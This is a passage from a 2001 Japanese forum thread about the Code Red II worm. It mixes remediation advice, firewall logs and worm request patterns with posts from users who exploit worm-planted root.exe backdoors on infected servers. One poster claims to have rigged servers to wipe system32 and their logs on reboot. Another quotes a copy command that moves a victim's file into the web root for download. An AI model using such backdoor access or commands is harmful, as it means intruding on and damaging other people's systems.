495名無しさん@お腹いっぱい。:2001/08/08(水) 03:27
496名無しさん@お腹いっぱい。:2001/08/08(水) 03:29
inetnum: 61.18.0.0 - 61.18.255.255
netname: HKCABLE-HK
descr: HK Cable TV Ltd
descr: Cable Multi-Media Services
country: HK
admin-c: AD23-AP
tech-c: AD23-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-ICABLE
changed: [email protected] 20001213
source: APNIC

person: administrator dns
address: 12/F., Cable TV Tower,
address: 9 Hoi Shing Road,
address: Tsuen Wan,
address: N.T.,
address: HK
country: HK
phone: +852-2112-7516
fax-no: +852-2112-7977
e-mail: [email protected]
nic-hdl: AD23-AP
mnt-by: MAINT-HK-ICABLE
changed: [email protected] 20000811
source: APNIC
497名無しさん@お腹いっぱい。:2001/08/08(水) 03:29
>>495
たいしたのがないんですが・・・
498名無しさん@お腹いっぱい。:2001/08/08(水) 03:29
どう見ても個人鯖だな
例え企業でもエロ動画置いてある会社って・・・
ププッ
499名無しさん@お腹いっぱい。:2001/08/08(水) 03:31
だからヤメレってば。ホントに。
感染を放置している側に責任がないとはいわんが、
バックドアを仕掛けられてしまうのはワームのせいで故意ではないだろ。
しかし、そのバックドアを利用して侵入するのは故意だろ。
その違いをよく認識スレ。
500名無しさん@お腹いっぱい。:2001/08/08(水) 03:35
>>495
スキャンディスクによる修復フォルダの多いマシンやな(w
501名無しさん@お腹いっぱい。:2001/08/08(水) 03:36
前スレよりモラルを維持してきたが、ここに来てアレになったようだ。
502名無しさん@お腹いっぱい。:2001/08/08(水) 03:36
IISでFTPサーバーだけ動かしてるんだけど、これでも感染のおそれがあるの?
なるべくSP2当てたくないんだけど…。
503名無しさん@お腹いっぱい。:2001/08/08(水) 03:37
はなからFTPだけだったら、問題ない。
504名無しさん@お腹いっぱい。:2001/08/08(水) 03:38
うちの大学も犯されたらしい。
「本学の複数のコンピュータが侵入され…」だって。

http://www.jpcert.or.jp/
505名無しさん@お腹いっぱい。:2001/08/08(水) 03:38
>>501 皆、エロに反応した (藁
506名無しさん@お腹いっぱい。:2001/08/08(水) 03:38
ホントだな。この板にはそんなに厨房がおおいんか?
自ら「僕チャンバックドアを利用して他人のマシンを
覗いてマース!」って公言しているようなもんだろ。
キヲツケロヨ。
507名無しさん@お腹いっぱい。:2001/08/08(水) 03:38
>>428

c:\Program Files\Common Files\System\MSADC\root.exe
には、なんにもなかったのですが、
c:\inetpub\scripts\root.exe
には、root.exeが存在していました。
感染しているのでしょうか?
パッチは当てているのですが。。。
すみません、教えてください。
508名無しさん@お腹いっぱい。:2001/08/08(水) 03:39
感染後にFTPだけにするのは、仕込まれ後なんでアウトだけどってことで。
509名無しさん@お腹いっぱい。:2001/08/08(水) 03:40
>>507
あぼーん対象です
頑張ってください
510名無しさん@お腹いっぱい。:2001/08/08(水) 03:40
>>507
合掌です。
511名無しさん@お腹いっぱい。:2001/08/08(水) 03:42
>>507
感染してます。すみやかに処置しましょう。
お大事に・・・
512507:2001/08/08(水) 03:42
うげ。馬路すか?
ちなみに、root.exeを削除するだけじゃ、駄目ですよね?
もしかして、インストールし直し? ドキドキ
513名無しさん@お腹いっぱい。:2001/08/08(水) 03:43
2ヶ月ぐらい前のsadmindに気が付いてなかったとかなら笑えるかも。
514名無しさん@お腹いっぱい。:2001/08/08(水) 03:45
>>512
まず回線切って、IISを無効にして、再起動しましょう。
とりあえずこれで、今以上の増殖と侵入は防げると思われ。

その後にココでも読んで、しっかり処置しましょう。
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
515名無しさん@お腹いっぱい。:2001/08/08(水) 03:46
>>512 とりあえす名前欄に fusianasan と入れてみ。
516507:2001/08/08(水) 03:47
ゾーンアラームもいれたのに。。。時すでに遅し?

藁ってやってください。。。
517名無しさん@お腹いっぱい。:2001/08/08(水) 03:47
>>513
あぁ、その可能性もあるねー。
>>507 は sadmind の可能性も考えたほうがいいと思われ。
518名無しさん@お腹いっぱい。:2001/08/08(水) 03:51
全ネットワークが停止した会社か。
業界最大手の某社ですかね・・・
519名無しさん@お腹いっぱい。:2001/08/08(水) 03:51
皆さんお待たせ〜
>>471>>495のエロ鯖は次回リブート時に
system32以下ログもろとも吹っ飛びます。
思う存分お楽しみください。

ちなみに>>471のほうがレベル高いもの持ってるよ
520507:2001/08/08(水) 03:52
実は、この一連の騒動で、
月曜日にOSインストールし直したばっかりなんです。
(コードレッドとは気が付かずに、別のトラブルかと思ったので)
ということは、sadmindの可能性は低いのでしょうか?
(sadmindについてはよく知らないので、今調べています。)
とりあえず、こちらから何かを送信している形跡はないのですが。。。
打つ足し脳
521名無しさん@お腹いっぱい。:2001/08/08(水) 03:53
>>519
おお〜神様
なんていい人だ
522名無しさん@お腹いっぱい。:2001/08/08(水) 03:54
>>519
ついでに使えるコマンド増やしてください
お願いします
523名無しさん@お腹いっぱい。:2001/08/08(水) 03:55
>>519
ワラタ
知らせるにはちょうど良いな(藁
524名無しさん@お腹いっぱい。:2001/08/08(水) 03:55
>>521 だまされるなっ! これは罠だ!!
525名無しさん@お腹いっぱい。:2001/08/08(水) 03:55
>>520
きちんとフォーマットして再構築やり直したか?
上書きだと消えないだろうし、
復元だとバックアップ時点で感染してたら意味がない。
526名無しさん@お腹いっぱい。:2001/08/08(水) 03:56
夏厨版になってしまった。
527名無しさん@お腹いっぱい。:2001/08/08(水) 03:56
>>524
えっそうなの?
528名無しさん@お腹いっぱい。:2001/08/08(水) 03:56
あー、今のうちにログを回収して >>519 のアドレスを確保しておこうかー。
529名無しさん@お腹いっぱい。:2001/08/08(水) 03:57
>>525
CodeRedIIの仕様を知らないと思われ。
530名無しさん@お腹いっぱい。:2001/08/08(水) 03:57
いつのまにか厨房のすくつになってしまったが
わらいがとまらん。。。。
531名無しさん@お腹いっぱい。:2001/08/08(水) 03:58
>>529
いや、root.exe
532名無しさん@お腹いっぱい。:2001/08/08(水) 03:58
もう一度いおう。
これからは、インターネットはこういうものになる。
533名無しさん@お腹いっぱい。:2001/08/08(水) 03:58
>>531
はいはい
534名無しさん@お腹いっぱい。:2001/08/08(水) 03:58
世界6大会計監査法人のひとつから
インバウンド食らってます(NISで遮断されてますが)
535名無しさん@お腹いっぱい。:2001/08/08(水) 03:59
>>528
自分もログに残るよ(w
536507:2001/08/08(水) 04:00
>>525
すみません、つきあっていただいて。。。
フォーマットして再構築したのですが、
その後ネットに誤ってつながったときに
感染したのかもしれません。

回線切って逝ってきます。
ありがとうございました。。。
537名無しさん@お腹いっぱい。:2001/08/08(水) 04:01
>>536
お大事に。
538名無しさん@お腹いっぱい。:2001/08/08(水) 04:01
>>524
今ログ見てきたけど>>519まじでやってるよ
539名無しさん@お腹いっぱい。:2001/08/08(水) 04:02
もう一度いおう。
これからは、インターネットはこういうものになっちゃった。
540名無しさん@お腹いっぱい。:2001/08/08(水) 04:02
夏厨ちゃんのネタウザイ。
541名無しさん@お腹いっぱい。:2001/08/08(水) 04:03
文子はモザイクあったよ
クロウシタノニ・・・
542名無しさん@お腹いっぱい。:2001/08/08(水) 04:09
      ∧ ∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜′ ̄ ̄( ゚Д゚ ) < 今晩ワこれで終わり
 UU ̄ ̄ U U   \_______________
543名無しさん@お腹いっぱい。:2001/08/08(水) 04:09
wwwrootにあげたら
ファイル名きぼんぬ
544名無しさん@お腹いっぱい。:2001/08/08(水) 04:10
独り占め禁止
545名無しさん@お腹いっぱい。:2001/08/08(水) 04:13
自分たちが何をやってるか分かってるんだろうとは思うが。
バックドアからの侵入の話は他でやってくれないかな。
546名無しさん@お腹いっぱい。:2001/08/08(水) 04:16
ダメです隊長ーーーーーー
みんなエロに目が眩んでますーーーーーーー (藁
547名無しさん@お腹いっぱい。:2001/08/08(水) 04:18
死肉に群がるハイエナとハゲタカの群れを連想
548名無しさん@お腹いっぱい。:2001/08/08(水) 04:18
549名無しさん@お腹いっぱい。:2001/08/08(水) 04:18
Cドライブのプログラムファイルの中の
いくつかのアプリがいきなり消えてしまったんですが
関係あるのでしょうか?
どなたか教えてください。
550とりあえず:2001/08/08(水) 04:21
default.idaをあひゃひゃにしといた
551名無しさん@お腹いっぱい。:2001/08/08(水) 04:27
どーよ、誰かダウソに成功したんか?
552名無しさん@お腹いっぱい。:2001/08/08(水) 04:27
>>546 死肉というか、腐った鯖だがな (藁
553名無しさん@お腹いっぱい。:2001/08/08(水) 04:31
ダウソの話はダウソ板に逝けよ
554名無しさん@お腹いっぱい。:2001/08/08(水) 05:04
ログを入手したがリブートでファイルが消えるような細工が成功した
形跡は見られなかった。
555名無しさん@お腹いっぱい。:2001/08/08(水) 05:17
>>549
自分で間違って消してしまった、ということは考えられないか?
IIS を動作させているのか?
OS は?
556名無しさん@お腹いっぱい。:2001/08/08(水) 06:03
質問でしゅ。韓国・中国のネットワークは大丈夫なのでしょうか?
転送速度がちょと落ちるぐらいなのでしょうか?
それともネットが使い物にならない状態なのでしょうか?
557名無しさん@お腹いっぱい。:2001/08/08(水) 06:13
感染してるやつのフォルダ消すにはどうしたらいいのかな?
558え〜ん:2001/08/08(水) 06:41
おはよう、ドキュソくん減った?
559あのう〜:2001/08/08(水) 07:09
>543

すんまそん こぴーできませんが?

f:\XXX\Tokyo sluts2.mpg c:\Inetpub\wwwroot
The filename, directory name, or volume label syntax is incorrect.
0 file(s) copied.

っていわれます。
560名無しさん@お腹いっぱい。:2001/08/08(水) 07:41
ドキュソは夜中だけにしてくれ・・・
561名無しさん@お腹いっぱい。:2001/08/08(水) 07:50
HKにある機械の情報をJPから操作して取り出したらどの国のケーサツに
つかまるんだ?
いんたーぽーるかあ?
562  :2001/08/08(水) 08:00
"GET /default.ida?XXXXXXX〜HTTP/1.0" 404
というのが今までのログだったが、GETもdefault.ida?も
なくて単純にXだけの羅列のログがいくつか残りだしている。
"XXXXXXXXXXX〜HTTP/1.0" 400
何だろう?
563名無しさん@お腹いっぱい。:2001/08/08(水) 08:03
↑既出
564名無しさん@お腹いっぱい。:2001/08/08(水) 08:08
>>561
日本から米国にアクセス(他人が仕掛けたトローイ利用)して、
日本の警視庁に検挙された例ならあるよ。
ttp://www.npa.go.jp/hightech/arrest_repo/kenkyo_2000.htm
565名無しさん@お腹いっぱい。:2001/08/08(水) 08:19
裁判はHKだろね、被害者HKなら、たぶん
刑務所もか(ワラ
566564:2001/08/08(水) 08:20
って、お祭り気分で目の前のエロに目がくらんで
やっちゃったドキュソ君たちにはもう遅いか・・・
よいこのみんなは真似しちゃだめだよ(はぁと)
567名無しさん@お腹いっぱい。:2001/08/08(水) 08:25
なんかスレ内容変わってるし・・・
夏だねぇ。
568名無しさん@Emacs:2001/08/08(水) 08:27
CodeRedに感染したエロサイトがあったよ
でも、運営している人がどんな人か恐くて手が出せないYO!
569名無しさん@お腹いっぱい。:2001/08/08(水) 08:28
捕まるわけないじゃん
570564:2001/08/08(水) 08:28
ホント夏だねぇ〜。
わらかしてはもらったけど。
571564:2001/08/08(水) 08:30
>>568
サイト管理者にメールしてあげるか、もしくは放置がよいと思われ。

さてさて、出勤するか。
572名無しさん@お腹いっぱい。:2001/08/08(水) 09:06
>>559
パラメーターはこうだろ
"f:\XXX\Tokyo sluts2.mpg"+"c:\Inetpub\wwwroot"
573名無しさん@お腹いっぱい。:2001/08/08(水) 09:10
>>564
覗いて見るのもNGなの?
574名無しさん@お腹いっぱい。:2001/08/08(水) 09:24
jpnicのwhois見て連絡とろうにも、メールアドレスすら記入のない
技術連絡担当者って何様のつもり・・・。
575名無しさん@お腹いっぱい。:2001/08/08(水) 09:29
夜中は厨房スレ化してるな(w
さて、テレホタイムに集めたログ、プロバイダに送るかな。
576573:2001/08/08(水) 09:32
見るだけならOKと思って固定IPで串も刺さずにアクセスしちゃったよ(TT
577あのう〜:2001/08/08(水) 09:41
>572
はいそれもやりました。
でもダメでした。
578名無しさん@お腹いっぱい。:2001/08/08(水) 09:42
>>574
あーいるねぇ。

仕方ないから会社名や電話番号で検索かけてみてるけど、
なくなってるとことか社名変更してるとことか、確証がとれな
くて鬱。
579名無しさん@お腹いっぱい。:2001/08/08(水) 09:52
今日の朝からポート.80だけじゃなく8080にも来るようになってるなぁ
これも Code Red?

ポート: 8080
モード: TCP
IP アドレス: 217.3.91.183
ホスト名: pd9035bb7.dip.t-dialin.net
580名無しさん@お腹いっぱい。:2001/08/08(水) 09:57
>>579
アクセスログはどんな感じ?
581すざけんなよ:2001/08/08(水) 10:18
Z登場
Zが親でA,Cの子供を自己増殖
GET /default.ida?ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
GET /default.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
GET /default.ida?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
582名無しさん@お腹いっぱい。:2001/08/08(水) 10:22
>>574
(1) ヤーさま。
(2) ただのおやじ。
583名無しさん@お腹いっぱい。:2001/08/08(水) 10:24
>>581
GET /default.ida?萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え萌え
GET /default.ida?鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱鬱
(ただしUTF-8に変換)
584名無しさん@お腹いっぱい。:2001/08/08(水) 10:35
>>580
こんな感じ
01.8.8 9:56:30 AM 拒否 Web 共有 kk-393.alphatec.or.jp
01.8.8 9:56:20 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:18 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:15 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:13 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:11 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:56:08 AM 拒否 不明 (8080) 61.129.120.179
01.8.8 9:55:46 AM 拒否 Web 共有 210.107.98.33
01.8.8 9:55:45 AM 拒否 Web 共有 210.107.98.33
01.8.8 9:54:18 AM 拒否 不明 (8080) 210.14.229.53
01.8.8 9:54:17 AM 拒否 不明 (8080) 210.14.229.53
01.8.8 9:54:16 AM 拒否 不明 (8080) 210.14.229.53
01.8.8 9:54:15 AM 拒否 不明 (8080) 210.14.229.53
01.8.8 9:51:37 AM 拒否 Web 共有 210.109.54.5
01.8.8 9:51:37 AM 拒否 Web 共有 210.109.54.5
01.8.8 9:51:36 AM 拒否 Web 共有 210.109.54.5
01.8.8 9:50:25 AM 拒否 Web 共有 yokohamako2-158.ppp-1.dion.ne.jp
01.8.8 9:50:21 AM 拒否 Web 共有 yokohamako2-158.ppp-1.dion.ne.jp
01.8.8 9:50:18 AM 拒否 Web 共有 yokohamako2-158.ppp-1.dion.ne.jp
01.8.8 9:48:28 AM 拒否 Web 共有 210.73.76.5
01.8.8 9:48:27 AM 拒否 Web 共有 210.73.76.5
01.8.8 9:48:26 AM 拒否 Web 共有 210.73.76.5
01.8.8 9:42:09 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:08 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:07 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:06 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:05 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:42:04 AM 拒否 不明 (8080) pd9035bb7.dip.t-dialin.net
01.8.8 9:41:51 AM 拒否 Web 共有 210.101.100.106
01.8.8 9:41:50 AM 拒否 Web 共有 210.101.100.106
01.8.8 9:41:49 AM 拒否 Web 共有 210.101.100.106
01.8.8 9:38:15 AM 拒否 不明 (8080) 211.95.67.243
01.8.8 9:38:09 AM 拒否 不明 (8080) 211.95.67.243
01.8.8 9:38:04 AM 拒否 不明 (8080) 211.95.67.243
01.8.8 9:38:01 AM 拒否 不明 (8080) 211.95.67.243
01.8.8 9:37:59 AM 拒否 不明 (8080) 211.95.67.243
アナログモデムにて接続中、やたらとモデムのアクセスランプが点滅する

何で?と思ってモデムのプロパティを見ると、大量のパケットを送信中

もしや?と思ってnetstatを見ると、いろんなサイトのport80に接続中

そんなバカな、と思ってタスクマネージャを開くと、IIS動作中。

ガ━━(゚Д゚;)━━ン!
586名無しさん@お腹いっぱい。:2001/08/08(水) 10:38
>>584
バックドアだのがあいてるところ、巡回中なんじゃないか?
587名無しさん@お腹いっぱい。:2001/08/08(水) 10:44
ADSLで接続中、突然通信できなくなる

プロバイダがCodeRedのパケットストームで落ちていると断定

「ゴルァ! CodeRed喰らって落ちてるぞ。早く直せオラ」と電話

「お客様のマシンからCodeRedのパケット出ておりましたので切り離しました」

ガ━━(゚Д゚;)━━ン!
588名無しさん@お腹いっぱい。:2001/08/08(水) 10:47
5 不正アクセス禁止法違反
(1)他人が仕掛けたトロイの木馬系ハッキングプログラムから取得したID、パスワードを使
用して、アメリカ合衆国に設置された有料ゲームサイトの認証サーバーに対して不正アクセスを
行い、ゲームを行った。(平成12年2月検挙。警視庁)
(2)有料掲示板「2ショットチャット」の認証機能が甘いことに乗じ、自作CGIプログラム
を使用してセキュリティホールを突き、パスワードを入力することなく不正アクセスした。ま
た、不特定多数の者が当該掲示板にアクセスできるようなリンクを自分の管理するホームページ
上に作成した。(平成12年6月検挙。北海道、富山)
(3)インターネット上の掲示板で知り合ったハッカーグループが、インターネットで不正に入
手した他人の識別符号を使用して、大学やプロバイダーに対して、その管理者等になりすまして
不正アクセスした。(平成12年11月検挙。愛知等)

ドキュソ八倉厨房が多いねえ( ´∀`)
589名無しさん@お腹いっぱい。:2001/08/08(水) 10:48
>>ガ━━(゚Д゚;)━━ン!
これいいねぇ(w
590名無しさん@お腹いっぱい。:2001/08/08(水) 10:49
>>581
新しい亜種って事?
591名無しさん@お腹いっぱい。:2001/08/08(水) 10:50
(3)専門学生(20歳)は、ホームページの中の爆弾マークをクリックすると自動的に110
番につながる携帯電話(インターネット接続)のホームページを開設し、多数の事情を知らない
閲覧者に110番させ警察の通信指令業務を妨害した。(平成12年8月検挙。偽計業務妨害。
警視庁・高知)

これいいねぇ
ブラクラも業務妨害罪?(w
592名無しさん@お腹いっぱい。:2001/08/08(水) 10:55
ポリが罠張っているのに気づいてない厨房も多いね、このスレ(w
593名無しさん@お腹いっぱい。:2001/08/08(水) 11:04
IIS鯖からのoutgoingのsynパケットを弾くように
パケットフィルタを設定してください
594名無しさん@お腹いっぱい。:2001/08/08(水) 11:05
>>592
ワラタ
どんな罠だよ
ダウソ板は行った方が大漁だぞ(w
595名無しさん@お腹いっぱい。:2001/08/08(水) 11:07
8080は手動でしょうね。うちのルータの弾きログには1個もないよ
137と53舐めが3回ずつ、80は今日だけですでに一千行超えてる・・・
Apachは1行だけどルータは3行記録するからねぇ
596名無しさん@お腹いっぱい。:2001/08/08(水) 11:15
先週RT50iが落ちまくったんで
ファームウェアをRev.3.05.38にしたけど、
3日目にしてまた落ちた。
なんか対応策無い?
お盆休めないな、このままじゃ。
597名無しさん@お腹いっぱい。:2001/08/08(水) 11:16
>>595
BlackICEで見ると6カウントずつだけど。SYNのリトライは6発ずつ(攻撃側OSのデフォ?)で、
ルータが3行以上は記録抑制してるだけか。
598夏だし:2001/08/08(水) 11:22

対策方法が1つだけある!ログ取るな!
599名無しさん@お腹いっぱい。:2001/08/08(水) 11:23
>>596
うちは http service off にして、念のため
httpd listen 8080
httpd host none
とかしているけど。今のところ大丈夫みたいだが。
600名無しさん@Emacs:2001/08/08(水) 11:27
8080はproxyを探しているに一票